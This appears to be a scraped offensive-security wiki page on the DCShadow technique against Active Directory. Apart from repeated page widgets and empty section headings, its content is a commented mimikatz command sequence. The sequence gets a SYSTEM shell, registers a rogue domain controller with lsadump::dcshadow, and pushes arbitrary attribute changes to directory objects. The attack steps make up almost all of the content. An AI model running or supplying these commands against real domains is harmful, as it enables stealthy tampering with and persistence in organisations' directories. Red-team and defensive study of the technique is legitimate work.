DC Shadow
They told me I could be anything I wanted ... So I became a domain controller
Theory

CN=Configuration


Practice
Talk
Resources
Last updated
Was this helpful?
They told me I could be anything I wanted ... So I became a domain controller

CN=Configuration


Last updated
Was this helpful?
Was this helpful?
# In a mimikatz shell, launched with DA rights
# This will be the trigger shell
privilege::debug
# The following command will open a new mimikatz shell as NT-AUTHORITY\SYSTEM
# This will be the RPC shell
process::runp
# On both shell, run the following command to confirm permissions
# On the trigger shell, it will return the domain admin account name (used to lauch the first mimikatz shell)
# On the RPC shell, it will return NT-AUTHORITY\SYSTEM
token::whoami# (RPC shell)
lsadump::dcshadow /object:ObjectToModify /attribute:AttributeToModifyOnTargetedObject /value:NewValueOfTargetedAttribute# (Trigger shell)
# The command below will register the shadow DC, push the changes, and unregister
lsadump::dcshadow /push